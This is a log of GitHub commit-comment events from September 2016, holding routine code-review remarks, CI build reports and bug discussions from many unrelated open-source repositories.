{"id":"4598889290","type":"CommitCommentEvent","actor":{"login":"AJRussell"},"repo":{"name":"AJRussell/Handheld-Color-Console"},"payload":{"comment":{"id":19120627,"position":null,"line":null,"path":null,"commit_id":"5750f11ed0d24d12f135b57dcf486f0fde65e8d2","created_at":"2016-09-21T20:57:24Z","updated_at":"2016-09-21T20:57:24Z","body":"Hi tobozo,\r\n\r\nwith this memory footprint I was thinking it would be possible to reproduce some of the classic Tetris sounds for in game play, along with the music at startup.\r\n\r\nI'm really not sure how to go about it though.\r\n\r\nIts a cool sequencer, thanks for sharing.\r\n"}},"created_at":"2016-09-21T20:57:24Z"}
{"id":"4598892622","type":"CommitCommentEvent","actor":{"login":"hristoterezov"},"repo":{"name":"jitsi/jitsi-meet"},"payload":{"comment":{"id":19120636,"position":3,"line":3,"path":"css/_videolayout_default.scss","commit_id":"388f86816517b0f112c3f9a5fdf86a442d15afeb","created_at":"2016-09-21T20:57:58Z","updated_at":"2016-09-21T20:57:58Z","body":"This z-index is hiding the toolbars when the ring overlay is shown. @m-voloshin Do we actually need this z-index and why?"}},"created_at":"2016-09-21T20:57:58Z"}
{"id":"4598893057","type":"CommitCommentEvent","actor":{"login":"EnzzoCaaue"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19120638,"position":null,"line":null,"path":null,"commit_id":"5722d3860c590d0ff7e5bfaffcfcede8028b720f","created_at":"2016-09-21T20:58:04Z","updated_at":"2016-09-21T20:58:04Z","body":"Nice job man! Well done,"}},"created_at":"2016-09-21T20:58:04Z"}
{"id":"4598902713","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19120656,"position":null,"line":null,"path":null,"commit_id":"c58ea292f10f671d6fc33e7484f510e29c8aa075","created_at":"2016-09-21T20:59:46Z","updated_at":"2016-09-21T20:59:46Z","body":"develop (evanweaver) - i386-Windows-7-VisualStudio-12: OK (2403 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.16%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T20:59:46Z"}
{"id":"4598903577","type":"CommitCommentEvent","actor":{"login":"nathanhammond"},"repo":{"name":"pzuraq/rfcs"},"payload":{"comment":{"id":19120660,"position":null,"line":null,"path":null,"commit_id":"8c7384ba8c7bc75a25291f99c49220f8ffd722ce","created_at":"2016-09-21T20:59:55Z","updated_at":"2016-09-21T20:59:55Z","body":"I like the unintentional proposal of a `configs` collection."}},"created_at":"2016-09-21T20:59:55Z"}
{"id":"4598906906","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19120667,"position":null,"line":null,"path":null,"commit_id":"deb528da4f280a448434f93042f1cde96dee5f93","created_at":"2016-09-21T21:00:29Z","updated_at":"2016-09-21T21:00:29Z","body":"Thank you @snicolet, this is strange since the bench reported all those options as usual with the csv to put into the test... I'm now trying to understand!"}},"created_at":"2016-09-21T21:00:29Z"}
{"id":"4598909653","type":"CommitCommentEvent","actor":{"login":"Magisus"},"repo":{"name":"glennsarti/facter"},"payload":{"comment":{"id":19120670,"position":null,"line":null,"path":null,"commit_id":"1a6db3a52ee98cd818ce589abb9be167bb4cbf57","created_at":"2016-09-21T21:00:57Z","updated_at":"2016-09-21T21:00:57Z","body":"These look really good! They seem to cover all the cases we discussed. Do they all pass?"}},"created_at":"2016-09-21T21:00:57Z"}
{"id":"4598918141","type":"CommitCommentEvent","actor":{"login":"kpamnany"},"repo":{"name":"jeff-regier/Celeste.jl"},"payload":{"comment":{"id":19120687,"position":37,"line":230,"path":"src/source_division_inference.jl","commit_id":"0c69e48646808440430563a52c44542fbcf0fe7f","created_at":"2016-09-21T21:02:32Z","updated_at":"2016-09-21T21:02:32Z","body":"Heh, please hang on. I'm currently cleaning up Garbo and Garbo.jl so things are in flux."}},"created_at":"2016-09-21T21:02:32Z"}
{"id":"4598918520","type":"CommitCommentEvent","actor":{"login":"shlevy"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":19120689,"position":null,"line":null,"path":null,"commit_id":"4de06391058724814756a8c74ae36c279cf34006","created_at":"2016-09-21T21:02:36Z","updated_at":"2016-09-21T21:02:36Z","body":"Oops, thanks!"}},"created_at":"2016-09-21T21:02:36Z"}
{"id":"4598920049","type":"CommitCommentEvent","actor":{"login":"thomasfillon"},"repo":{"name":"Yaafe/Yaafe"},"payload":{"comment":{"id":19120694,"position":null,"line":null,"path":null,"commit_id":"aca46783cc460ef11924af5b5b6b1155cb41781b","created_at":"2016-09-21T21:02:52Z","updated_at":"2016-09-21T21:02:52Z","body":"Fix  #8"}},"created_at":"2016-09-21T21:02:52Z"}
{"id":"4598922463","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19120701,"position":15,"line":64,"path":"styles/main.css","commit_id":"491e85705f4a6cb6f69d0ae76fa9deeb391822aa","created_at":"2016-09-21T21:03:19Z","updated_at":"2016-09-21T21:03:19Z","body":"new line here"}},"created_at":"2016-09-21T21:03:19Z"}
{"id":"4598923294","type":"CommitCommentEvent","actor":{"login":"tavaughan"},"repo":{"name":"tavaughan/SlicerIGT"},"payload":{"comment":{"id":19120705,"position":20,"line":456,"path":"PivotCalibration/Logic/vtkSlicerPivotCalibrationLogic.cxx","commit_id":"80106cce77376eb13399aa08d9da6ac862e8b532","created_at":"2016-09-21T21:03:27Z","updated_at":"2016-09-21T21:03:27Z","body":"I believe that this code may be in error. I've been experiencing an issue lately where my calibrated needle model flips inappropriately. I just ran the debugger, and found that I have the following two transforms being used for the dot product here:\r\n\r\n[30.046057288537074, 81.866301200484003, -3.1759702391088886]\r\n[0, 0, -1]\r\n\r\nWhich results in a value > 1 and triggers the flipping case. However, the needle is already in the correct orientation and should not be flipped. This actually inverts the shaft to the opposite direction of what it should be.\r\n\r\nWhat is the intuition behind this code? I am afraid I do not understand what is being computed here or why."}},"created_at":"2016-09-21T21:03:27Z"}
{"id":"4598923682","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"ajkeller34/Unitful.jl"},"payload":{"comment":{"id":19120707,"position":null,"line":null,"path":null,"commit_id":"5ea14982d1caf379d45ff35799122aeef395c462","created_at":"2016-09-21T21:03:31Z","updated_at":"2016-09-21T21:03:31Z","body":"yeah, aside from maybe the version numbers (which get populated whenever you first run Pkg.generate and may not be accurate forever) the default generated template should be good for most purposes"}},"created_at":"2016-09-21T21:03:31Z"}
{"id":"4598928850","type":"CommitCommentEvent","actor":{"login":"glennsarti"},"repo":{"name":"glennsarti/facter"},"payload":{"comment":{"id":19120712,"position":null,"line":null,"path":null,"commit_id":"1a6db3a52ee98cd818ce589abb9be167bb4cbf57","created_at":"2016-09-21T21:04:32Z","updated_at":"2016-09-21T21:04:32Z","body":"So far they're all ok.  They'll need rework as per our discussions about how to store the fact file.  But it's a start."}},"created_at":"2016-09-21T21:04:32Z"}
{"id":"4598929563","type":"CommitCommentEvent","actor":{"login":"bgruening"},"repo":{"name":"bgruening/training-material"},"payload":{"comment":{"id":19120713,"position":null,"line":null,"path":null,"commit_id":"fe9ce325961a30ccd2912327b9e6c061d42bd5fb","created_at":"2016-09-21T21:04:39Z","updated_at":"2016-09-21T21:04:39Z","body":"Cool! Thanks!"}},"created_at":"2016-09-21T21:04:39Z"}
{"id":"4598930362","type":"CommitCommentEvent","actor":{"login":"akisch"},"repo":{"name":"akisch/S4"},"payload":{"comment":{"id":19120715,"position":null,"line":null,"path":null,"commit_id":"5b47cf35673d031859e0516c7cf065ae56bb5bf1","created_at":"2016-09-21T21:04:49Z","updated_at":"2016-09-21T21:04:49Z","body":"Whoops, something weird happened with this commit but hopefully it shouldn't mess things up (apart from the init file...)"}},"created_at":"2016-09-21T21:04:49Z"}
{"id":"4598930995","type":"CommitCommentEvent","actor":{"login":"tavaughan"},"repo":{"name":"SlicerIGT/SlicerIGT"},"payload":{"comment":{"id":19120716,"position":20,"line":456,"path":"PivotCalibration/Logic/vtkSlicerPivotCalibrationLogic.cxx","commit_id":"80106cce77376eb13399aa08d9da6ac862e8b532","created_at":"2016-09-21T21:04:56Z","updated_at":"2016-09-21T21:04:56Z","body":"\r\n\r\nI believe that this code may be in error. I've been experiencing an issue lately where my calibrated needle model flips inappropriately. I just ran the debugger, and found that I have the following two transforms being used for the dot product here:\r\n\r\n[30.046057288537074, 81.866301200484003, -3.1759702391088886]\r\n[0, 0, -1]\r\n\r\nWhich results in a value > 1 and triggers the flipping case. However, the needle is already in the correct orientation and should not be flipped. This actually inverts the shaft to the opposite direction of what it should be.\r\n\r\nWhat is the intuition behind this code? I am afraid I do not understand what is being computed here or why.\r\n"}},"created_at":"2016-09-21T21:04:56Z"}
{"id":"4598935066","type":"CommitCommentEvent","actor":{"login":"mmixx"},"repo":{"name":"PokemonGoF/PokemonGo-Web"},"payload":{"comment":{"id":19120723,"position":null,"line":null,"path":null,"commit_id":"1429169d7396a247db99da33125d216fd53cf18a","created_at":"2016-09-21T21:05:42Z","updated_at":"2016-09-21T21:05:42Z","body":"This fixes #70 and #72 "}},"created_at":"2016-09-21T21:05:42Z"}
{"id":"4598936702","type":"CommitCommentEvent","actor":{"login":"nathanhammond"},"repo":{"name":"pzuraq/rfcs"},"payload":{"comment":{"id":19120724,"position":null,"line":null,"path":null,"commit_id":"8c7384ba8c7bc75a25291f99c49220f8ffd722ce","created_at":"2016-09-21T21:06:02Z","updated_at":"2016-09-21T21:06:02Z","body":"> Which is ONLY injected into the container of the engine mounted at `/route/to/my-engine`. The same engine, mounted anywhere else, will receive the object from the first example.\r\n\r\nIt's interesting to me that you're proposing using the container to provide isolation as opposed to a module name. This is inline with how isolation is handled in engines presently (you can literally require assets out of them and it will work if those modules are in `require.entries`). By pushing the API to load these modules (or module) through the container we gain control over whether or not the config is visible."}},"created_at":"2016-09-21T21:06:02Z"}
{"id":"4598937146","type":"CommitCommentEvent","actor":{"login":"satukark"},"repo":{"name":"TheSoftwareFactory/experiment-server"},"payload":{"comment":{"id":19120725,"position":17,"line":377,"path":"experiment_server/models/db.py","commit_id":"f385370c5abc095fee8b93829ed699385b7ba578","created_at":"2016-09-21T21:06:06Z","updated_at":"2016-09-21T21:06:06Z","body":"It finds a row(s) from applications where application's id = id that we try to look for (e.g. here https://github.com/TheSoftwareFactory/experiment-server/blob/database/experiment_server/views/configurationkeys.py#L31 ) and returns result as array. First() returns the first result. In this case there's only one matching row 'cos id is unique so this http://docs.sqlalchemy.org/en/rel_1_0/orm/query.html#sqlalchemy.orm.query.Query.get would be better?"}},"created_at":"2016-09-21T21:06:06Z"}
{"id":"4598940125","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-module-pihcore"},"payload":{"comment":{"id":19120731,"position":null,"line":null,"path":null,"commit_id":"546f4abe2f0fcaa33cc08f1500bb8289cb88e611","created_at":"2016-09-21T21:06:37Z","updated_at":"2016-09-21T21:06:37Z","body":"Oh, cool, so you had to implement this to get it to work... looks good to me at a quick glance.\r\n\r\nOne thing that confused me was how the existing global properties in the configs (like \"mirebalais.checkIn.paymentAmounts\": \"100,75,50,0\") were getting set previously.  It looks like this was happening in the MirebalaisHospitalActivator (see the updateGlobalProperty and updateGlobalProperty from config).  I *think* this should be no longer necessary after your improved method--can you test and remove the old code from Mirebalais Activator if it works without it?"}},"created_at":"2016-09-21T21:06:37Z"}
{"id":"4598942087","type":"CommitCommentEvent","actor":{"login":"tmaurer13"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19120736,"position":32,"line":71,"path":"equaldigit.py","commit_id":"2c945cdc9e0db59f600b4f7d5afc7bcdc15b7960","created_at":"2016-09-21T21:06:59Z","updated_at":"2016-09-21T21:06:59Z","body":"Got it! thank you!"}},"created_at":"2016-09-21T21:06:59Z"}
{"id":"4598943724","type":"CommitCommentEvent","actor":{"login":"prjemian"},"repo":{"name":"areaDetector/ADCore"},"payload":{"comment":{"id":19120741,"position":26,"line":26,"path":"LICENSE","commit_id":"04923e0c260b2156ff33b0662adfeed427260a79","created_at":"2016-09-21T21:07:16Z","updated_at":"2016-09-21T21:07:16Z","body":"--- ... must this ...\r\n+++ ... must include this ...\r\n\r\ntwo lines here\r\n\r\nAlso, a copyright notice in the code is customary."}},"created_at":"2016-09-21T21:07:16Z"}
{"id":"4598947320","type":"CommitCommentEvent","actor":{"login":"prjemian"},"repo":{"name":"areaDetector/ADCore"},"payload":{"comment":{"id":19120748,"position":18,"line":18,"path":"LICENSE","commit_id":"04923e0c260b2156ff33b0662adfeed427260a79","created_at":"2016-09-21T21:07:57Z","updated_at":"2016-09-21T21:07:57Z","body":"same as note in section 4"}},"created_at":"2016-09-21T21:07:57Z"}
{"id":"4598949167","type":"CommitCommentEvent","actor":{"login":"dannye"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":19120752,"position":null,"line":null,"path":null,"commit_id":"5b45422cc2cdb531c5729ff3169a2d5ea9ba3d35","created_at":"2016-09-21T21:08:05Z","updated_at":"2016-09-21T21:08:05Z","body":"Why did you do this again?"}},"created_at":"2016-09-21T21:08:05Z"}
{"id":"4598955535","type":"CommitCommentEvent","actor":{"login":"dzmi3"},"repo":{"name":"dzmi3/java-courses"},"payload":{"comment":{"id":19120768,"position":null,"line":null,"path":null,"commit_id":"782f5ce98b4826644c9e3b9a1e90fb8ae96d9428","created_at":"2016-09-21T21:09:15Z","updated_at":"2016-09-21T21:09:15Z","body":"add sub, mult, div, summ"}},"created_at":"2016-09-21T21:09:15Z"}
{"id":"4598964575","type":"CommitCommentEvent","actor":{"login":"pzuraq"},"repo":{"name":"pzuraq/rfcs"},"payload":{"comment":{"id":19120789,"position":null,"line":null,"path":null,"commit_id":"8c7384ba8c7bc75a25291f99c49220f8ffd722ce","created_at":"2016-09-21T21:10:57Z","updated_at":"2016-09-21T21:10:57Z","body":"That was my thinking as well. It also seemed less magical - if we compiled a file and imported it using standard module syntax, I think it would actually be confusing to users who don't know about the build process. \"How am I able to import a file that doesn't exist?\"\r\n\r\nI agree that configurations almost definitely can be statically compiled at build time, in fact I'd like to add that as a requirement. But since they don't actually exist as files, it made sense to let users know that this is something special via using `inject` rather than module imports."}},"created_at":"2016-09-21T21:10:57Z"}
{"id":"4598964785","type":"CommitCommentEvent","actor":{"login":"filipcynarski"},"repo":{"name":"FluentLenium/FluentLenium"},"payload":{"comment":{"id":19120790,"position":null,"line":null,"path":null,"commit_id":"56399cc583d84cdca6bc26a61dd226261b71ce02","created_at":"2016-09-21T21:10:59Z","updated_at":"2016-09-21T21:10:59Z","body":"Good suggestion, I've replaced and extended it :)"}},"created_at":"2016-09-21T21:10:59Z"}
{"id":"4598965905","type":"CommitCommentEvent","actor":{"login":"tmaurer13"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19120800,"position":32,"line":71,"path":"equaldigit.py","commit_id":"2c945cdc9e0db59f600b4f7d5afc7bcdc15b7960","created_at":"2016-09-21T21:11:12Z","updated_at":"2016-09-21T21:11:12Z","body":"Wait, so for other investigators and the two outside labs, there's no \"1 - \" before the binomial. And where does the \" - 1\" get included in the argument of the binomial? (sorry for all the questions, I'm trying to add this test to the permutation test right now and I want to make sure I don't screw anything up) "}},"created_at":"2016-09-21T21:11:12Z"}
{"id":"4598974009","type":"CommitCommentEvent","actor":{"login":"lodici"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19120835,"position":null,"line":null,"path":null,"commit_id":"8117a79933ff2fd951a5330c964c8906f341ce04","created_at":"2016-09-21T21:12:43Z","updated_at":"2016-09-21T21:12:43Z","body":"![_009](https://cloud.githubusercontent.com/assets/2443519/18729159/78f757fa-8048-11e6-846f-5fb7c56a1625.jpg)\r\n"}},"created_at":"2016-09-21T21:12:43Z"}
{"id":"4598975704","type":"CommitCommentEvent","actor":{"login":"dashesy"},"repo":{"name":"davisking/dlib"},"payload":{"comment":{"id":19120838,"position":null,"line":null,"path":null,"commit_id":"48df23a0e065e01c5ba176d4999fffb0d9a29e02","created_at":"2016-09-21T21:13:03Z","updated_at":"2016-09-21T21:13:03Z","body":"It may have been a bug you encountered, I remember something about compilation stuck. Did you try to update the compiler?"}},"created_at":"2016-09-21T21:13:03Z"}
{"id":"4598982982","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19120854,"position":null,"line":null,"path":null,"commit_id":"dad9bcf02eeb2ad19a81dc17dc9549e8dabe785d","created_at":"2016-09-21T21:14:30Z","updated_at":"2016-09-21T21:14:30Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.254.dad9bcf02eeb2ad19a81dc17dc9549e8dabe785d](http://build.palaso.org/viewLog.html?buildId=77032&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **UNKNOWN**\nSummary: Canceled (Tests passed: 1084, ignored: 16; exit code 1 (new)) Build time: 00:02:26"}},"created_at":"2016-09-21T21:14:30Z"}
{"id":"4598987535","type":"CommitCommentEvent","actor":{"login":"runcom"},"repo":{"name":"miabbott/files"},"payload":{"comment":{"id":19120877,"position":null,"line":null,"path":null,"commit_id":"27a5ae9213126f8aac1a708d46671ac75ad6098b","created_at":"2016-09-21T21:15:19Z","updated_at":"2016-09-21T21:15:19Z","body":"@miabbott wooohooo :smile: "}},"created_at":"2016-09-21T21:15:19Z"}
{"id":"4598987999","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19120879,"position":null,"line":null,"path":null,"commit_id":"68219e99faa989f918c71deefef41d9536de567a","created_at":"2016-09-21T21:15:24Z","updated_at":"2016-09-21T21:15:24Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;wvchDKh2&#x2F;51-replace-images-links\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Replace images links</a>"}},"created_at":"2016-09-21T21:15:24Z"}
{"id":"4598993306","type":"CommitCommentEvent","actor":{"login":"OwnageIsMagic"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19120890,"position":50,"line":2099,"path":"source/vk_lib.js","commit_id":"d655d06e2432d0d00c68deee798e9a410dd34384","created_at":"2016-09-21T21:16:23Z","updated_at":"2016-09-21T21:16:23Z","body":"на счёт подписей ничего не знаю, а для проверять есть https://saucelabs.com/open-source в режиме ручных тестов с любой версией на ваш вкус"}},"created_at":"2016-09-21T21:16:23Z"}
{"id":"4598996253","type":"CommitCommentEvent","actor":{"login":"TheLesserEvil"},"repo":{"name":"mkneuron/compneuro"},"payload":{"comment":{"id":19120896,"position":4,"line":169,"path":"week2/perceptronNo2","commit_id":"5ea96f757b37794dffbb666156f071523c87474a","created_at":"2016-09-21T21:16:55Z","updated_at":"2016-09-21T21:16:55Z","body":"I'm just drunk tired, sorry :) it was correct also before :)\r\nnow I'm a github noob, so I don't know how to remove the comment!\r\n"}},"created_at":"2016-09-21T21:16:55Z"}
{"id":"4598997085","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19120898,"position":null,"line":null,"path":null,"commit_id":"4f6ed76e613ffedbb54018344f120681841777d4","created_at":"2016-09-21T21:17:05Z","updated_at":"2016-09-21T21:17:05Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ar7JIrfkTOC8UEsWSbHlbA"}},"created_at":"2016-09-21T21:17:05Z"}
{"id":"4598998076","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic2-app-base"},"payload":{"comment":{"id":19120903,"position":null,"line":null,"path":null,"commit_id":"b087e58259b6c0835c34ebb8b1f12378a6f11d99","created_at":"2016-09-21T21:17:15Z","updated_at":"2016-09-21T21:17:15Z","body":"@jgw96 review pull request https://github.com/driftyco/ionic2-app-base/pull/67/commits/d57635c1f2c787d1bce3c42df5a08accb0641aa2 in your time."}},"created_at":"2016-09-21T21:17:15Z"}
{"id":"4599001498","type":"CommitCommentEvent","actor":{"login":"sprucetrap87"},"repo":{"name":"kushaltirumala/trump-slackbot"},"payload":{"comment":{"id":19120916,"position":4,"line":41,"path":"app.js","commit_id":"7408b93a08e80b1bda58b4e646cd53f734c94853","created_at":"2016-09-21T21:17:54Z","updated_at":"2016-09-21T21:17:54Z","body":"n"}},"created_at":"2016-09-21T21:17:54Z"}
{"id":"4599001735","type":"CommitCommentEvent","actor":{"login":"jakebenbow"},"repo":{"name":"jakebenbow/about_me"},"payload":{"comment":{"id":19120917,"position":null,"line":null,"path":null,"commit_id":"e9a443d116a6780f19916b3f51d8753b0040077c","created_at":"2016-09-21T21:17:57Z","updated_at":"2016-09-21T21:17:57Z","body":"Added a 'logo' image on the top header div. \r\nAdded a link on 'The Last of Us' under the 'Favourite Game' heading, linking to the game's website. Also gave this an 'a:hover' css style, to take away the underline when the cursor is hovering over it, in order to show clearly that it is a link.\r\nAdded links to the four images in the gallery, each linking to their respective websites.\r\nAdded a 'Blog Update' div, and filled it with dummy text.\r\nAdded an image in the 'Blog Update' div, and gave it a border.\r\n"}},"created_at":"2016-09-21T21:17:57Z"}
{"id":"4599001737","type":"CommitCommentEvent","actor":{"login":"FPriceGithub"},"repo":{"name":"teamevolve/EVOLVE"},"payload":{"comment":{"id":19120918,"position":null,"line":null,"path":null,"commit_id":"50ecf06b762d37868eb5b39a23ab74288375a57b","created_at":"2016-09-21T21:17:57Z","updated_at":"2016-09-21T21:17:57Z","body":"Started leaving notes in pseudocode"}},"created_at":"2016-09-21T21:17:57Z"}
{"id":"4599004271","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19120922,"position":null,"line":null,"path":null,"commit_id":"dad9bcf02eeb2ad19a81dc17dc9549e8dabe785d","created_at":"2016-09-21T21:18:27Z","updated_at":"2016-09-21T21:18:27Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.255.dad9bcf02eeb2ad19a81dc17dc9549e8dabe785d](http://build.palaso.org/viewLog.html?buildId=77033&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1286, ignored: 17 Build time: 00:03:13"}},"created_at":"2016-09-21T21:18:27Z"}
{"id":"4599015805","type":"CommitCommentEvent","actor":{"login":"wf9a5m75"},"repo":{"name":"snoopconsulting/phonegap-googlemaps-plugin"},"payload":{"comment":{"id":19120956,"position":null,"line":null,"path":null,"commit_id":"afd3ccd960427a49162cdb19c19a67d3ef57c977","created_at":"2016-09-21T21:20:41Z","updated_at":"2016-09-21T21:20:41Z","body":"Could you tell me what is purpose for?"}},"created_at":"2016-09-21T21:20:41Z"}
{"id":"4599024337","type":"CommitCommentEvent","actor":{"login":"mhsieh"},"repo":{"name":"PacificBiosciences/pitchfork"},"payload":{"comment":{"id":19120974,"position":null,"line":null,"path":null,"commit_id":"4d8ef9a980159fa29a2eb288c86a0984881f643d","created_at":"2016-09-21T21:22:16Z","updated_at":"2016-09-21T21:22:16Z","body":"#287 "}},"created_at":"2016-09-21T21:22:16Z"}
{"id":"4599028140","type":"CommitCommentEvent","actor":{"login":"mark-selyaeff"},"repo":{"name":"NikitaVishniakov/cs102"},"payload":{"comment":{"id":19120982,"position":15,"line":15,"path":"caesar.py","commit_id":"7389952c8b75a93326d220f96d5cde72ae1ad6a7","created_at":"2016-09-21T21:22:58Z","updated_at":"2016-09-21T21:22:58Z","body":"По PEPу \"+\" разделяется пробелами"}},"created_at":"2016-09-21T21:22:58Z"}
{"id":"4599039858","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/ledger-publisher"},"payload":{"comment":{"id":19121022,"position":null,"line":null,"path":null,"commit_id":"91e98dacb1a8f4f6c39edf2810b07a1ee8194a02","created_at":"2016-09-21T21:25:06Z","updated_at":"2016-09-21T21:25:06Z","body":"++"}},"created_at":"2016-09-21T21:25:06Z"}
{"id":"4599048018","type":"CommitCommentEvent","actor":{"login":"shorowit"},"repo":{"name":"NREL/OpenStudio-BEopt"},"payload":{"comment":{"id":19121040,"position":9,"line":170,"path":"measures/ResidentialHotWaterDistribution/measure.rb","commit_id":"23bd4a834aaa369ec731b1586526dd93d72f581d","created_at":"2016-09-21T21:26:39Z","updated_at":"2016-09-21T21:26:39Z","body":"@jmaguire1 Note that you overwrote some changes here made by another person. I will fix this, but you need to be more careful."}},"created_at":"2016-09-21T21:26:39Z"}
{"id":"4599052177","type":"CommitCommentEvent","actor":{"login":"shorowit"},"repo":{"name":"NREL/OpenStudio-BEopt"},"payload":{"comment":{"id":19121048,"position":138,"line":512,"path":"measures/ResidentialHotWaterDistribution/measure.rb","commit_id":"23bd4a834aaa369ec731b1586526dd93d72f581d","created_at":"2016-09-21T21:27:22Z","updated_at":"2016-09-21T21:27:22Z","body":"So many debugging statements here. I will fix but please review your changes better before pushing."}},"created_at":"2016-09-21T21:27:22Z"}
{"id":"4599052584","type":"CommitCommentEvent","actor":{"login":"NikitaVishniakov"},"repo":{"name":"NikitaVishniakov/cs102"},"payload":{"comment":{"id":19121050,"position":15,"line":15,"path":"caesar.py","commit_id":"7389952c8b75a93326d220f96d5cde72ae1ad6a7","created_at":"2016-09-21T21:27:28Z","updated_at":"2016-09-21T21:27:28Z","body":"Зря я комменты не закрыл\r\n"}},"created_at":"2016-09-21T21:27:28Z"}
{"id":"4599057341","type":"CommitCommentEvent","actor":{"login":"rubo77"},"repo":{"name":"freifunk-kiel/ffmap-backend"},"payload":{"comment":{"id":19121065,"position":2,"line":2,"path":"mkmap.sh","commit_id":"aba5dd98a8757e7b114d973a246248fcdd619855","created_at":"2016-09-21T21:28:22Z","updated_at":"2016-09-21T21:28:22Z","body":"ist das nur besser? oder ist der alte falsch?"}},"created_at":"2016-09-21T21:28:22Z"}
{"id":"4599061963","type":"CommitCommentEvent","actor":{"login":"nathanhammond"},"repo":{"name":"pzuraq/rfcs"},"payload":{"comment":{"id":19121085,"position":null,"line":null,"path":null,"commit_id":"8c7384ba8c7bc75a25291f99c49220f8ffd722ce","created_at":"2016-09-21T21:29:16Z","updated_at":"2016-09-21T21:29:16Z","body":"Can you make this more concrete?\r\n\r\n> Results in this config object:\r\n \r\n ```js\r\n {\r\n   \"my-engine\": {\r\n     //...\r\n   },\r\n   \"my-addon\": {\r\n     theme: 'blue'\r\n   }\r\n }\r\n ```\r\n"}},"created_at":"2016-09-21T21:29:16Z"}
{"id":"4599062089","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19121087,"position":null,"line":null,"path":null,"commit_id":"deb528da4f280a448434f93042f1cde96dee5f93","created_at":"2016-09-21T21:29:17Z","updated_at":"2016-09-21T21:29:17Z","body":"@snicolet I forgot to commit again after the last edit, from:\r\n`TUNE(Center, InnerMid, InnerLong, OuterMid, Outer, OuterLong, MidEdge, NearEdge, FarEdge, Corner, update_psqt);`\r\nto:\r\n`TUNE(SetRange(-50, 50), Center, InnerMid, InnerLong, OuterMid, Outer, OuterLong, MidEdge, NearEdge, FarEdge, Corner, update_psqt);`\r\nThank you again for avoiding wasting more resources..."}},"created_at":"2016-09-21T21:29:17Z"}
{"id":"4599062540","type":"CommitCommentEvent","actor":{"login":"julianladisch"},"repo":{"name":"folio-org/raml-module-builder"},"payload":{"comment":{"id":19121088,"position":null,"line":null,"path":null,"commit_id":"8d25f48b37169c212fb8847c6e85fb04f94ff9be","created_at":"2016-09-21T21:29:22Z","updated_at":"2016-09-21T21:29:22Z","body":"@shale99, spacing fixes have been committed by \r\nadamdickmeiss in https://github.com/folio-org/raml-module-builder/pull/12"}},"created_at":"2016-09-21T21:29:22Z"}
{"id":"4599064863","type":"CommitCommentEvent","actor":{"login":"jimlawton"},"repo":{"name":"mattcarberry/virtualagc"},"payload":{"comment":{"id":19121094,"position":null,"line":null,"path":null,"commit_id":"fc9be773b8f6adf536a6822209f3a09847d857b4","created_at":"2016-09-21T21:29:50Z","updated_at":"2016-09-21T21:29:50Z","body":"Mike, I don't think that's a division symbol. I think it's just a \"+\". "}},"created_at":"2016-09-21T21:29:50Z"}
{"id":"4599067123","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19121103,"position":79,"line":79,"path":"styles/album.css","commit_id":"61682319394d66cf79ce6ece109974f556891e3d","created_at":"2016-09-21T21:30:16Z","updated_at":"2016-09-21T21:30:16Z","body":"new line here please :)"}},"created_at":"2016-09-21T21:30:16Z"}
{"id":"4599068013","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19121105,"position":61,"line":61,"path":"album.html","commit_id":"61682319394d66cf79ce6ece109974f556891e3d","created_at":"2016-09-21T21:30:27Z","updated_at":"2016-09-21T21:30:27Z","body":"new line here please"}},"created_at":"2016-09-21T21:30:27Z"}
